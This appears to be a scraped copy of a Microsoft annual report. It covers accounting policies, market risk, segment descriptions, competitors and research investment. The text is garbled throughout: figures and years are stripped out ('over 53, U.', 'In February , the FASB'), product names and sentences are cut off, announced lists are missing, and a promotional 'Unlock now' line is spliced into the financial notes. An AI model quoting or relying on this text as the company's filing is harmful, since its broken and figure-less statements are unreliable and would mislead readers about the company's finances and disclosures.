For fixed-income securities, we also evaluate whether we have plans to sell the security or it is more likely than not that we will be required to sell the security before recovery.

We also consider specific adverse conditions related to the financial health of and business outlook for the investee, including industry and sector performance, changes in technology, and operational and financing cash flow factors.

Once a decline in fair value is determined to be other-than-temporary, an impairment charge is recorded to other income expense , net and a new cost basis in the investment is established. We allocate goodwill to reporting units based on the reporting unit expected to benefit from the business combination.

We evaluate our reporting units on an annual basis and, if necessary, reassign goodwill using a relative fair value allocation approach. Goodwill is tested for impairment at the reporting unit level operating segment or one level below an operating segment on an annual basis May 1 for us and between annual tests if an event occurs or circumstances change that would more likely than not reduce the fair value of a reporting unit below its carrying value.

These events or circumstances could include a significant change in the business climate, legal factors, operating performance indicators, competition, or sale or disposition of a significant portion of a reporting unit. Application of the goodwill impairment test requires judgment, including the identification of reporting units, assignment of assets and liabilities to reporting units, assignment of goodwill to reporting units, and determination of the fair value of each reporting unit.

The fair value of each reporting unit is estimated primarily through the use of a discounted cash flow methodology. This analysis requires significant judgments, including estimation of future cash flows, which is dependent on internal forecasts, estimation of the long-term rate of growth for our business, estimation of the useful life over which cash flows will occur, and determination of our weighted average cost of capital.

The estimates used to calculate the fair value of a reporting unit change from year to year based on operating results, market conditions, and other factors.

Changes in these estimates and assumptions could materially affect the determination of fair value and goodwill impairment for each reporting unit. Costs incurred internally in researching and developing a computer software product are charged to expense until technological feasibility has been established for the product. Once technological feasibility is established, all software costs are capitalized until the product is available for general release to customers.

Judgment is required in determining when technological feasibility of a product is established. We have determined that technological feasibility for our software products is reached after all high-risk development issues have been resolved through coding and testing. Generally, this occurs shortly before the products are released to production.

The amortization of these costs is included in cost of revenue over the estimated life of the products. The outcomes of legal proceedings and claims brought against us are subject to significant uncertainty. An estimated loss from a loss contingency such as a legal proceeding or claim is accrued by a charge to income if it is probable that an asset has been impaired or a liability has been incurred and the amount of the loss can be reasonably estimated.

In determining whether a loss should be accrued we evaluate, among other factors, the degree of probability of an unfavorable outcome and the ability to make a reasonable estimate of the amount of loss.

Changes in these factors could materially impact our consolidated financial statements. We recognize the tax benefit from an uncertain tax position only if it is more likely than not that the tax position will be sustained on examination by the taxing authorities, based on the technical merits of the position.

Accounting literature also provides guidance on derecognition of income tax assets and liabilities, classification of deferred income tax assets and liabilities, accounting for interest and penalties associated with tax positions, and income tax disclosures. Judgment is required in assessing the future tax consequences of events that have been recognized in our consolidated financial statements or tax returns.

Variations in the actual outcome of these future tax consequences could materially impact our consolidated financial statements. Inventories are stated at average cost, subject to the lower of cost or net realizable value. Cost includes materials, labor, and manufacturing overhead related to the purchase and production of inventories.

Net realizable value is the estimated selling price less estimated costs of completion, disposal, and transportation. We regularly review inventory quantities on hand, future purchase commitments with our suppliers, and the estimated utility of our inventory. These reviews include analysis of demand forecasts, product life cycle status, product development plans, current sales levels, pricing strategy, and component cost trends. If our review indicates a reduction in utility below carrying value, we reduce our inventory to a new cost basis through a charge to cost of revenue.

Management is responsible for the preparation of the consolidated financial statements and related information that are presented in this report. The Company designs and maintains accounting and internal control systems to provide reasonable assurance at reasonable cost that assets are safeguarded against loss from unauthorized use or disposition, and that the financial records are reliable for preparing consolidated financial statements and maintaining accountability for assets.

These systems are augmented by written policies, an organizational structure providing division of responsibilities, careful selection and training of qualified personnel, and a program of internal audits. The Board of Directors, through its Audit Committee, consisting solely of independent directors of the Company, meets periodically with management, internal auditors, and our independent registered public accounting firm to ensure that each is meeting its responsibilities and to discuss matters concerning internal controls and financial reporting.

Amy E. Frank H. We are exposed to economic risk from foreign exchange rates, interest rates, credit risk, and equity prices. We use derivatives instruments to manage these risks, however, they may still impact our consolidated financial statements. Certain forecasted transactions, assets, and liabilities are exposed to foreign currency risk. We monitor our foreign currency exposures daily to maximize the economic effectiveness of our foreign currency positions.

Principal currencies hedged include the euro, Japanese yen, British pound, Canadian dollar, and Australian dollar. Securities held in our fixed-income portfolio are subject to different interest rate risks based on their maturities. We manage the average maturity of the fixed-income portfolio to achieve economic returns that correlate to certain global fixed-income indices. Our fixed-income portfolio is diversified and consists primarily of investment-grade securities.

We manage credit exposures relative to broad-based indices and to facilitate portfolio diversification. This included presenting one-day VaR as well as average, high, and low VaR by risk category throughout the reporting period.

Given the changes in size and allocation of our portfolio of financial assets, we believe sensitivity analysis is more informative in representing the potential impact to the portfolio as a result of market movements. Therefore, we have presented a sensitivity analysis for each risk category below.

Sensitivity analysis is not intended to represent actual losses in fair value, including determinations of other-than-temporary losses in fair value in accordance with accounting principles generally accepted in the United States of America, but is used as a risk estimation and management tool. The following table sets forth the potential loss in future earnings or fair values, including associated derivatives, resulting from hypothetical changes in relevant market rates or prices:.

Refer to accompanying notes. We have recast certain prior period income tax liabilities as discussed in the Recent Tax Legislation section below. We have also recast prior period securities lending payables to other current liabilities in our consolidated balance sheets to conform to the current period presentation. These items had no impact in our consolidated income statements or net cash from or used in operating, financing, or investing in our consolidated cash flows statements.

The consolidated financial statements include the accounts of Microsoft Corporation and its subsidiaries. Intercompany transactions and balances have been eliminated. Investments for which we are not able to exercise significant influence over the investee and which do not have readily determinable fair values are accounted for under the cost method. Preparing financial statements requires management to make estimates and assumptions that affect the reported amounts of assets, liabilities, revenue, and expenses.

Assets and liabilities recorded in foreign currencies are translated at the exchange rate on the balance sheet date. Revenue and expenses are translated at average rates of exchange prevailing during the year. Product revenue includes sales from operating systems; cross-device productivity applications; server applications; business solution applications; desktop and server management tools; software development tools; video games; and hardware such as PCs, tablets, gaming and entertainment consoles, other intelligent devices, and related accessories.

Service and other revenue includes sales from cloud-based solutions that provide customers with software, services, platforms, and content such as Microsoft Office , Microsoft Azure, Microsoft Dynamics , and Xbox Live; solution support; and consulting services. Service and other revenue also includes sales from online advertising and LinkedIn. Revenue is recognized upon transfer of control of promised products or services to customers in an amount that reflects the consideration we expect to receive in exchange for those products or services.

We enter into contracts that can include various combinations of products and services, which are generally capable of being distinct and accounted for as separate performance obligations.

Revenue is recognized net of allowances for returns and any taxes collected from customers, which are subsequently remitted to governmental authorities. Licenses for on-premises software provide the customer with a right to use the software as it exists when made available to the customer. Customers may purchase perpetual licenses or subscribe to licenses, which provide customers with the same functionality and differ mainly in the duration over which the customer benefits from the software.

Revenue from distinct on-premises licenses is recognized upfront at the point in time when the software is made available to the customer. In cases where we allocate revenue to software updates, primarily because the updates are provided at no additional charge, revenue is recognized as the updates are provided, which is generally ratably over the estimated life of the related device or license.

SA conveys rights to new software and upgrades released over the contract period and provides support, tools, and training to help customers deploy and use products more efficiently. On-premises licenses are considered distinct performance obligations when sold with SA. Revenue allocated to SA is generally recognized ratably over the contract period as customers simultaneously consume and receive benefits, given that SA comprises distinct performance obligations that are satisfied over time.

Cloud services, which allow customers to use hosted software over the contract period without taking possession of the software, are provided on either a subscription or consumption basis. Revenue related to cloud services provided on a subscription basis is recognized ratably over the contract period. Revenue related to cloud services provided on a consumption basis, such as the amount of storage used in a period, is recognized based on the customer utilization of such resources.

When cloud services require a significant level of integration and interdependency with software and the individual components are not considered distinct, all revenue is recognized over the period in which the cloud services are provided.

Revenue from search advertising is recognized when the advertisement appears in the search results or when the action necessary to earn the revenue has been completed.

Revenue from consulting services is recognized as services are provided. Our hardware is generally highly dependent on, and interrelated with, the underlying operating system and cannot function without the operating system.

In these cases, the hardware and software license are accounted for as a single performance obligation and revenue is recognized at the point in time when ownership is transferred to resellers or directly to end customers through retail stores and online marketplaces.

Refer to Note 21 — Segment Information and Geographic Data for further information, including revenue by significant product and service offering. Judgment is required to determine the SSP for each distinct performance obligation.

Timing of revenue recognition may differ from the timing of invoicing to customers. We record a receivable when revenue is recognized prior to invoicing, or unearned revenue when revenue is recognized subsequent to invoicing. For multi-year agreements, we generally invoice customers annually at the beginning of each annual coverage period. We record a receivable related to revenue recognized for multi-year on-premises licenses as we have an unconditional right to invoice and receive payment in the future related to those licenses.

The allowance for doubtful accounts reflects our best estimate of probable losses inherent in the accounts receivable balance. We determine the allowance based on known troubled accounts, historical experience, and other currently available evidence. Unearned revenue comprises mainly unearned revenue related to volume licensing programs, which may include SA and cloud services. Unearned revenue is generally invoiced annually at the beginning of each contract period for multi-year agreements and recognized ratably over the coverage period.

Unearned revenue also includes payments for consulting services to be performed in the future; LinkedIn subscriptions; Office subscriptions; Xbox Live subscriptions; Windows 10 post-delivery support; Dynamics business solutions; Skype prepaid credits and subscriptions; and other offerings for which we have been paid in advance and earn the revenue when we transfer control of the product or service. Refer to Note 15 — Unearned Revenue for further information, including unearned revenue by segment and changes in unearned revenue during the period.

Payment terms and conditions vary by contract type, although terms generally include a requirement of payment within 30 to 60 days. In instances where the timing of revenue recognition differs from the timing of invoicing, we have determined our contracts generally do not include a significant financing component. The primary purpose of our invoicing terms is to provide customers with simplified and predictable ways of purchasing our products and services, not to receive financing from our customers or to provide customers with financing.

Examples include invoicing at the beginning of a subscription term with revenue recognized ratably over the contract period, and multi-year on-premises licenses that are invoiced annually with revenue recognized upfront. We recognize an asset for the incremental costs of obtaining a contract with a customer if we expect the benefit of those costs to be longer than one year. We have determined that certain sales incentive programs meet the requirements to be capitalized. Total capitalized costs to obtain a contract were immaterial during the periods presented and are included in other current and long-term assets in our consolidated balance sheets.

We apply a practical expedient to expense costs as incurred for costs to obtain a contract with a customer when the amortization period would have been one year or less. These costs include our internal sales force compensation program and certain partner sales incentive programs as we have determined annual compensation is commensurate with annual sales activities.

Capitalized software development costs are amortized over the estimated lives of the products. We provide for the estimated costs of fulfilling our obligations under hardware and software warranties at the time the related revenue is recognized.

For hardware warranties, we estimate the costs based on historical and projected product failure rates, historical and projected repair costs, and knowledge of specific product failures if any.

The specific hardware warranty terms and conditions vary depending upon the product sold and the country in which we do business, but generally include parts and labor over a period generally ranging from 90 days to three years.

For software warranties, we estimate the costs to provide bug fixes, such as security patches, over the estimated life of the software. We regularly reevaluate our estimates to assess the adequacy of the recorded warranty liabilities and adjust the amounts as necessary. Such costs related to software development are included in research and development expense until the point that technological feasibility is reached, which for our software products, is generally shortly before the products are released to production.

Once technological feasibility is reached, such costs are capitalized and amortized to cost of revenue over the estimated lives of the products. Advertising costs are expensed as incurred. The fair value of stock awards is based on the quoted price of our common stock on the grant date less the present value of expected dividends not received during the vesting period.

Compensation cost for RSUs is recognized using the straight-line method and for PSUs is recognized using the accelerated method. Income tax expense includes U. Certain income and expenses are not reported in tax returns and financial statements in the same year. The tax effect of such temporary differences is reported as deferred income taxes.

Deferred tax assets are reported net of a valuation allowance when it is more likely than not that a tax benefit will not be realized. All deferred income taxes are classified as long-term in our consolidated balance sheets. We account for certain assets and liabilities at fair value. The hierarchy below lists three levels of fair value based on the extent to which inputs used in measuring fair value are observable in the market. We categorize each of our fair value measurements in one of these three levels based on the lowest level input that is significant to the fair value measurement in its entirety.

These levels are:. We measure certain assets, including our cost and equity method investments, at fair value on a nonrecurring basis when they are deemed to be other-than-temporarily impaired. The fair values of these investments are determined based on valuation techniques using the best information available, and may include quoted market prices, market comparables, and discounted cash flow projections.

An impairment charge is recorded when the cost of the investment exceeds its fair value and this condition is determined to be other-than-temporary. Our other current financial assets and current financial liabilities have fair values that approximate their carrying values. We consider all highly liquid interest-earning investments with a maturity of three months or less at the date of purchase to be cash equivalents.

The fair values of these investments approximate their carrying values. In general, investments with original maturities of greater than three months and remaining maturities of less than one year are classified as short-term investments. Investments with maturities beyond one year may be classified as short-term based on their highly liquid nature and because such marketable securities represent the investment of cash that is available for current operations.

All cash equivalents and short-term investments are classified as available-for-sale and realized gains and losses are recorded using the specific identification method. Changes in market value, excluding other-than-temporary impairments, are reflected in OCI. Equity and other investments classified as long-term include both debt and equity instruments. Debt and publicly-traded equity securities are classified as available-for-sale and realized gains and losses are recorded using the specific identification method.

Changes in the market value of available-for-sale securities, excluding other-than-temporary impairments, are reflected in OCI. Common and preferred stock and other investments that are restricted for more than one year or are not publicly traded are recorded at cost or using the equity method.

We lend certain fixed-income and equity securities to increase investment returns. These transactions are accounted for as secured borrowings and the loaned securities continue to be carried as investments in our consolidated balance sheets. Cash received is recorded as an asset with a corresponding liability. Investments are considered to be impaired when a decline in fair value is judged to be other-than-temporary.

Fair value is calculated based on publicly available market information or other estimates determined by management. We employ a systematic methodology on a quarterly basis that considers available quantitative and qualitative evidence in evaluating potential impairment of our investments.

Derivative instruments are recognized as either assets or liabilities and are measured at fair value. The accounting for changes in the fair value of a derivative depends on the intended use of the derivative and the resulting designation.

For derivative instruments designated as fair value hedges, the gains losses are recognized in earnings in the periods of change together with the offsetting losses gains on the hedged items attributed to the risk being hedged. For options designated as fair value hedges, changes in the time value are excluded from the assessment of hedge effectiveness and are recognized in earnings.

For derivative instruments designated as cash flow hedges, the effective portion of the gains losses on the derivatives is initially reported as a component of OCI and is subsequently recognized in earnings when the hedged exposure is recognized in earnings. For options designated as cash flow hedges, changes in the time value are excluded from the assessment of hedge effectiveness and are recognized in earnings. Gains losses on derivatives representing either hedge components excluded from the assessment of effectiveness or hedge ineffectiveness are recognized in earnings.

For derivative instruments that are not designated as hedges, gains losses from changes in fair values are primarily recognized in other income expense , net. Property and equipment is stated at cost less accumulated depreciation, and depreciated using the straight-line method over the shorter of the estimated useful life of the asset or the lease term. The estimated useful lives of our property and equipment are generally as follows: computer software developed or acquired for internal use, three to seven years; computer equipment, two to three years; buildings and improvements, five to 15 years; leasehold improvements, three to 20 years; and furniture and equipment, one to 10 years.

Land is not depreciated. We determine if an arrangement is a lease at inception. Finance leases are included in property and equipment, other current liabilities, and other long-term liabilities in our consolidated balance sheets. ROU assets represent our right to use an underlying asset for the lease term and lease liabilities represent our obligation to make lease payments arising from the lease.

Operating lease ROU assets and liabilities are recognized at commencement date based on the present value of lease payments over the lease term. As most of our leases do not provide an implicit rate, we use our incremental borrowing rate based on the information available at commencement date in determining the present value of lease payments.

We use the implicit rate when readily determinable. The operating lease ROU asset also includes any lease payments made and excludes lease incentives. Our lease terms may include options to extend or terminate the lease when it is reasonably certain that we will exercise that option. Lease expense for lease payments is recognized on a straight-line basis over the lease term.

We have lease agreements with lease and non-lease components, which are generally accounted for separately. For certain equipment leases, such as vehicles, we account for the lease and non-lease components as a single lease component. Additionally, for certain equipment leases, we apply a portfolio approach to effectively account for the operating lease ROU assets and liabilities. All of our intangible assets are subject to amortization and are amortized using the straight-line method over their estimated period of benefit, ranging from one to 20 years.

We evaluate the recoverability of intangible assets periodically by taking into account events or circumstances that may warrant revised estimates of useful lives or that indicate the asset may be impaired.

Refer to Note 13 — Income Taxes for further discussion. As a result of the TCJA, we have recast certain prior period income tax liabilities in our consolidated balance sheets to conform to the current period presentation. Previously reported balances were impacted as follows:. These adjustments had no impact in our consolidated income statements or net cash from or used in operating, financing, or investing in our consolidated cash flows statements. In the second quarter of fiscal year , we remeasured our deferred taxes related to unrealized gains on our investment balances using the reduced tax rate.

As required by GAAP, we recognized the net tax benefit in the provision for income taxes in our consolidated income statements, even though the deferred taxes were initially recognized in AOCI, which resulted in stranded tax effects.

Adoption of the standard had no impact to our consolidated income statements or cash flows statements. In February , the FASB issued a new standard related to leases to increase transparency and comparability among organizations by requiring the recognition of ROU assets and lease liabilities on the balance sheet. Quickly create and share content that stands out, manage your schedule with ease, effortlessly connect with others and enjoy peace of mind – all with Microsoft Unlock now.

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We offer an array of services, including cloud-based solutions that provide customers with software, services, platforms, and content, and we provide solution support and consulting services.

We also deliver relevant online advertising to a global audience. To achieve our vision, our research and development efforts focus on three interconnected ambitions:.

We are in a unique position to empower people and organizations to succeed in a rapidly evolving workplace. Computing experiences are evolving, no longer bound to one device at a time. Instead, experiences are expanding to many devices as people move from home to work to on the go. These modern needs, habits, and expectations of our customers are motivating us to bring Microsoft Office , Windows platform, devices, including Microsoft Surface, and third-party applications into a more cohesive Microsoft experience.

Our growth depends on securely delivering continuous innovation and advancing our leading productivity and collaboration tools and services, including Office, Microsoft Dynamics, and LinkedIn.

Microsoft Teams is core to our vision for the modern workplace as the digital hub that creates a single canvas for teamwork, conversations, meetings, and content.

Microsoft Relationship Sales solution brings together LinkedIn Sales Navigator and Dynamics to transform business to business sales through social selling. Dynamics for Talent with LinkedIn Recruiter and Learning gives human resource professionals a complete solution to compete for talent. These scenarios represent a move to unlock creativity and inspire teamwork, while simplifying security and management. Organizations of all sizes can now digitize business-critical functions, redefining what customers can expect from their business applications.

This creates an opportunity for us to reach new customers and increase usage and engagement with existing customers. Companies are looking to use digital technology to fundamentally reimagine how they empower their employees, engage customers, optimize their operations, and change the very core of their products and services. Partnering with organizations on their digital transformation is one of our largest opportunities and we are uniquely positioned to become the strategic digital transformation platform and partner of choice.

Our strategy requires continued investment in datacenters and other infrastructure to support our services. Microsoft Azure is a trusted cloud with comprehensive compliance coverage and AI-based security built in. Our cloud business benefits from three economies of scale: datacenters that deploy computational resources at significantly lower cost per unit than smaller ones; datacenters that coordinate and aggregate diverse customer, geographic, and application demand patterns, improving the utilization of computing, storage, and network resources; and multi-tenancy locations that lower application maintenance labor costs.

As one of the two largest providers of cloud computing at scale, we believe we work from a position of strength. Being a global, hyper-scale cloud, Azure uniquely offers hybrid consistency, developer productivity, AI capabilities, and trusted security and compliance. Moreover, with Azure Stack, organizations can extend Azure into their own datacenters to create a consistent stack across the public cloud and the intelligent edge.

Our hybrid infrastructure consistency spans identity, data, compute, management, and security, helping to support the real-world needs and evolving regulatory requirements of commercial customers and enterprises. The ability to convert data into AI drives our competitive advantage. We are accelerating adoption of AI innovations from research to products. Our innovation helps every developer be an AI developer, with approachable new tools from Azure Machine Learning Studio for creating simple machine learning models, to the powerful Azure Machine Learning Workbench for the most advanced AI modeling and data science.

The acquisition is expected to close by the end of the calendar year. We strive to make computing more personal by putting users at the core of the experience, enabling them to interact with technology in more intuitive, engaging, and dynamic ways.

Windows 10 is the cornerstone of our ambition, providing a foundation for the secure, modern workplace, and designed to foster innovation through rich and consistent experiences across the range of existing devices and entirely new device categories. Windows 10 empowers people with AI-first interfaces ranging from voice-activated commands through Cortana, inking, immersive 3D content storytelling, and mixed reality experiences.

Cloud sharing and co-authoring experiences are now natively enabled with OneDrive files on demand. Windows 10 is more accessible for everyone with new features like Eye Control, which gives people the ability to operate a PC using just their eyes. We are working to create a broad developer opportunity by unifying the Windows installed base on Windows 10 and enabling universal Windows applications to run across devices so developers and OEMs can contribute to a thriving Windows ecosystem.

Additionally, we are committed to designing and marketing first-party devices, such as the Surface Laptop, Surface Book 2, and Surface Pro to help drive innovation, create new device categories, and stimulate demand in the Windows ecosystem. We are mobilizing to pursue our expansive opportunity in the gaming industry, broadening our approach to how we think about gaming end-to-end, from the way games are created and distributed to how they are played and viewed.

We have a strong position with our Xbox One console, our large and growing highly engaged community of gamers on Xbox Live, and with Windows 10, the most popular operating system for PC gamers. And we will continue to connect our gaming assets across PC, console, and mobile, and work to grow and engage the Xbox Live member network more deeply and frequently with new services like Mixer and Xbox Game Pass. Our approach is to enable gamers to play the games they want, with the people they want, on the devices they want.

Customers are looking to us to accelerate their own digital transformations and to unlock new opportunity in this era of intelligent cloud and intelligent edge. We continue to develop complete, intelligent solutions for our customers that empower users to be creative and work together while safeguarding businesses and simplifying IT management. Our goal is to lead the industry in several distinct areas of technology over the long-term, which we expect will translate to sustained growth. We are investing significant resources in:.

Our future growth depends on our ability to transcend current product category definitions, business models, and sales motions. We have the opportunity to redefine what customers and partners can expect and are working to deliver new solutions that reflect the best of Microsoft. We operate our business and report our financial performance using three segments: Productivity and Business Processes, Intelligent Cloud, and More Personal Computing.

Our segments provide management with a comprehensive financial view of our key businesses. The segments enable the alignment of strategies and objectives across the development, sales, marketing, and services organizations, and they provide a framework for timely and rational allocation of resources within businesses. Additional information on our operating segments and geographic and product information is contained in Note 21 — Segment Information and Geographic Data of the Notes to Financial Statements.

Our Productivity and Business Processes segment consists of products and services in our portfolio of productivity, communication, and information services, spanning a variety of devices and platforms. This segment primarily comprises:. Office Commercial is designed to increase personal, team, and organizational productivity through a range of products and services.

Growth depends on our ability to reach new users in new markets such as first-line workers, small and medium businesses, and growth markets, as well as add value to our core product and service offerings to span productivity categories such as communication, collaboration, analytics, and security.

Office Commercial revenue is mainly affected by a combination of continued installed base growth and average revenue per user expansion, as well as the continued shift from Office licensed on-premises to Office CALs provide certain Office Commercial products and services with access rights to our server products and CAL revenue is reported with the associated Office products and services. Office Consumer is designed to increase personal productivity through a range of products and services.

Growth depends on our ability to reach new users, add value to our core product set, and continue to expand our product and service offerings into new markets. Office Consumer revenue is mainly affected by the percentage of customers that buy Office with their new devices and the continued shift from Office licensed on-premises to Office Office Consumer Services revenue is mainly affected by the demand for communication and storage through Skype, Outlook.

LinkedIn offers services that can be used by customers to transform the way they hire, market, sell, and learn. Talent Solutions is comprised of two elements: Hiring, and Learning and Development. Hiring provides services to recruiters that enable them to attract, recruit, and hire talent. Learning and Development provides subscriptions to enterprises and individuals to access online learning content. Premium Subscriptions enables professionals to manage their professional identity, grow their network, and connect with talent through additional services like premium search.

Premium Subscriptions also includes Sales Solutions, which helps sales professionals find, qualify, and create sales opportunities and accelerate social selling capabilities.

Growth will depend on our ability to increase the number of LinkedIn members and our ability to continue offering services that provide value for our members and increase their engagement. LinkedIn revenue is mainly affected by demand from enterprises and professional organizations for subscriptions to Talent Solutions and Premium Subscriptions offerings, as well as member engagement and the quality of the sponsored content delivered to those members to drive Marketing Solutions. Dynamics revenue is largely driven by the number of users licensed and the continued shift to Dynamics , a unified set of cloud-based intelligent business applications.

Competitors to Office include software and global application vendors, such as Apple, Cisco Systems, Facebook, Google, IBM, and Slack, and numerous web-based and mobile application competitors as well as local application developers. Apple distributes versions of its pre-installed application software, such as email and calendar products, through its PCs, tablets, and phones.

Cisco Systems is using its position in enterprise communications equipment to grow its unified communications business. Google provides a hosted messaging and productivity suite. Skype for Business and Skype also compete with a variety of instant messaging, voice, and video communication providers, ranging from start-ups to established enterprises. Web-based offerings competing with individual applications have also positioned themselves as alternatives to our products and services.

We compete by providing powerful, flexible, secure, and easy-to-use productivity and collaboration tools and services that create comprehensive solutions and work well with technologies our customers already have both on-premises or in the cloud. LinkedIn faces competition from online recruiting companies, talent management companies, and larger companies that are focusing on talent management and human resource services; job boards; traditional recruiting firms; and companies that provide learning and development products and services.

Marketing Solutions competes with online and offline outlets that generate revenue from advertisers and marketers. Dynamics competes with vendors such as Infor, Oracle, NetSuite. Our Intelligent Cloud segment consists of our public, private, and hybrid server products and cloud services that can power modern business. Our server products are designed to make IT professionals, developers, and their systems more productive and efficient. Server software is integrated server infrastructure and middleware designed to support software applications built on the Windows Server operating system.

This includes the server platform, database, business intelligence, storage, management and operations, virtualization, service-oriented architecture platform, security, and identity software. We also license standalone and software development lifecycle tools for software architects, developers, testers, and project managers.

Server products revenue is mainly affected by purchases through volume licensing programs, licenses sold to OEMs, and retail packaged products. CALs provide access rights to certain server products, including SQL Server and Windows Server, and revenue is reported along with the associated server product. Azure is a comprehensive set of cloud services that offer developers, IT professionals, and enterprises freedom to build, deploy, and manage applications on any platform or device.

Azure enables customers to devote more resources to development and use of applications that benefit their organizations, rather than managing on-premises hardware and software. Enterprise Services, including Premier Support Services and Microsoft Consulting Services, assist customers in developing, deploying, and managing Microsoft server and desktop solutions and provide training and certification to developers and IT professionals on various Microsoft products.

Our server products face competition from a wide variety of server operating systems and applications offered by companies with a range of market approaches. Vertically integrated computer manufacturers such as Hewlett-Packard, IBM, and Oracle offer their own versions of the Unix operating system preinstalled on server hardware.

Nearly all computer manufacturers offer server hardware for the Linux operating system and many contribute to Linux operating system development. The competitive position of Linux has also benefited from the large number of compatible applications now produced by many commercial and non-commercial software developers.

A number of companies, such as Red Hat, supply versions of Linux. We compete to provide enterprise-wide computing solutions and point solutions with numerous commercial software vendors that offer solutions and middleware technology platforms, software applications for connectivity both Internet and intranet , security, hosting, database, and e-business servers. IBM and Oracle lead a group of companies focused on the Java Platform Enterprise Edition that competes with our enterprise-wide computing solutions.

In middleware, we compete against Java vendors. Our database, business intelligence, and data warehousing solutions offerings compete with products from IBM, Oracle, SAP, and other companies. We believe our server products provide customers with advantages in performance, total costs of ownership, and productivity by delivering superior applications, development tools, compatibility with a broad base of hardware and software applications, security, and manageability.

Our Enterprise Services business competes with a wide range of companies that provide strategy and business planning, application development, and infrastructure services, including multinational consulting firms and small niche businesses focused on specific technologies. Our More Personal Computing segment consists of products and services geared towards harmonizing the interests of end users, developers, and IT professionals across all devices.

The Windows operating system is designed to deliver a more personal computing experience for users by enabling consistency of experience, applications, and information across their devices. Windows OEM revenue is impacted significantly by the number of Windows operating system licenses purchased by OEMs, which they pre-install on the devices they sell.

In addition to computing device market volume, Windows OEM revenue is impacted by:. Windows Commercial revenue often reflects the number of information workers in a licensed enterprise and is relatively independent of the number of PCs sold in a given year.

Patent licensing includes our programs to license patents we own for use across a broad array of technology areas, including mobile devices and cloud offerings. Windows IoT extends the power of Windows and the cloud to intelligent systems by delivering specialized operating systems, tools, and services for use in embedded devices. We design, manufacture, and sell devices, including Surface, PC accessories, and other intelligent devices, such as Surface Hub and HoloLens.

Our devices are designed to enable people and organizations to connect to the people and content that matter most using Windows and integrated Microsoft products and services. Surface is designed to help organizations, students, and consumers be more productive. In May , we announced plans to streamline our smartphone hardware business.

In November , we completed the sale of our feature Phone business. Our gaming platform is designed to provide a unique variety of entertainment using our devices, peripherals, applications, online services, and content. With the launch of the Mixer service in May , offering interactive live game streaming, and Xbox Game Pass in June , providing unlimited access to over Xbox titles, we continue to open new opportunities for customers to engage both on- and off-console.

Xbox Live enables people to connect and share online gaming experiences and is accessible on Xbox consoles, Windows-enabled devices, and other devices. Xbox Live is designed to benefit users by providing access to a network of certified applications and services and to benefit our developer and partner ecosystems by providing access to a large customer base. Xbox Live revenue is mainly affected by subscriptions and sales of Xbox Live enabled content, as well as advertising. We also continue to design and sell gaming content to showcase our unique platform capabilities for Xbox consoles, Windows-enabled devices, and other devices.

Growth of our Gaming business is determined by the overall active user base through Xbox Live enabled content, availability of games, providing exclusive game content that gamers seek, the computational power and reliability of the devices used to access our content and services, and the ability to create new experiences via online services, downloadable content, and peripherals.

Our Search business, including Bing and Bing Ads, is designed to deliver relevant online advertising to a global audience. We have several partnerships with other companies, including Oath formerly Yahoo! Growth depends on our ability to attract new users, understand intent, and match intent with relevant content and advertiser offerings.

Windows faces competition from various software products and from alternative platforms and devices, mainly from Apple and Google. We believe Windows competes effectively by giving customers choice, value, flexibility, security, an easy-to-use interface, and compatibility with a broad range of hardware and software applications, including those that enable productivity.

Devices face competition from various computer, tablet, and hardware manufacturers who offer a unique combination of high-quality industrial design and innovative technologies across various price points. These manufacturers, many of which are also current or potential partners and customers, include Apple and our Windows OEMs. Our gaming platform competes with console platforms from Nintendo and Sony, both of which have a large, established base of customers.

The lifecycle for gaming and entertainment consoles averages five to ten years. Nintendo released its latest generation console in March and Sony released its latest generation console in November We also compete with other providers of entertainment services through online marketplaces.

We believe our gaming platform is effectively positioned against competitive products and services based on significant innovation in hardware architecture, user interface, developer tools, online gaming and entertainment services, and continued strong exclusive content from our own game franchises as well as other digital content offerings. Our video games competitors include Electronic Arts and Activision Blizzard. Xbox Live faces competition from various online marketplaces, including those operated by Amazon, Apple, and Google.

Our search business competes with Google and a wide array of websites, social platforms like Facebook, and portals that provide content and online offerings to end users.

We have operations centers that support operations in their regions, including customer contract and order processing, credit and collections, information processing, and vendor management and logistics. In addition to the operations centers, we also operate datacenters throughout the Americas, Australia, Europe, and Asia.

To serve the needs of customers around the world and to improve the quality and usability of products in international markets, we localize many of our products to reflect local languages and conventions. Localizing a product may require modifying the user interface, altering dialog boxes, and translating text.

Our devices are primarily manufactured by third-party contract manufacturers. We generally have the ability to use other manufacturers if a current vendor becomes unavailable or unable to meet our requirements.

We plan to continue to make significant investments in a broad range of research and development efforts. We develop most of our products and services internally through the following engineering groups. Internal development allows us to maintain competitive advantages that come from product differentiation and closer technical control over our products and services. It also gives us the freedom to decide which modifications and enhancements are most important and when they should be implemented.

We strive to obtain information as early as possible about changing usage patterns and hardware advances that may affect software and hardware design. Before releasing new software platforms, and as we make significant modifications to existing platforms, we provide application vendors with a range of resources and guidelines for development, training, and testing. Generally, we also create product documentation internally.

We protect our intellectual property investments in a variety of ways. We work actively in the U. We are a leader among technology companies in pursuing patents and currently have a portfolio of over 53, U. From time to time, we enter into broader cross-license agreements with other technology companies covering entire groups of patents. We also purchase or license technology that we incorporate into our products and services.

At times, we make select intellectual property broadly available at no or low cost to achieve a strategic objective, such as promoting industry standards, advancing interoperability, or attracting and enabling our external development community.

Our increasing engagement with open source software will also cause us to license our intellectual property rights broadly in certain situations. While it may be necessary in the future to seek or renew licenses relating to various aspects of our products, services, and business methods, we believe, based upon past experience and industry practice, such licenses generally can be obtained on commercially reasonable terms. We believe our continuing research and product development are not materially dependent on any single license or other agreement with a third party relating to the development of our products.

Our success is based on our ability to create new and compelling products, services, and experiences for our users, to initiate and embrace disruptive technology trends, to enter new geographic and product markets, and to drive broad adoption of our products and services.

We invest in a range of emerging technology trends and breakthroughs that we believe offer significant opportunities to deliver value to our customers and growth for the company. Based on our assessment of key technology trends, we maintain our long-term commitment to research and development across a wide spectrum of technologies, tools, and platforms spanning digital work and life experiences, cloud computing, AI, devices, and operating systems.

While our main research and development facilities are located in Redmond, Washington, we also operate research and development facilities in other parts of the U. This global approach helps us remain competitive in local markets and enables us to continue to attract top talent from across the world. We generally fund research at the corporate level to ensure that we are looking beyond immediate product considerations to opportunities further in the future.

We also fund research and development activities at the operating segment level. Much of our segment level research and development is coordinated with other segments and leveraged across the company.

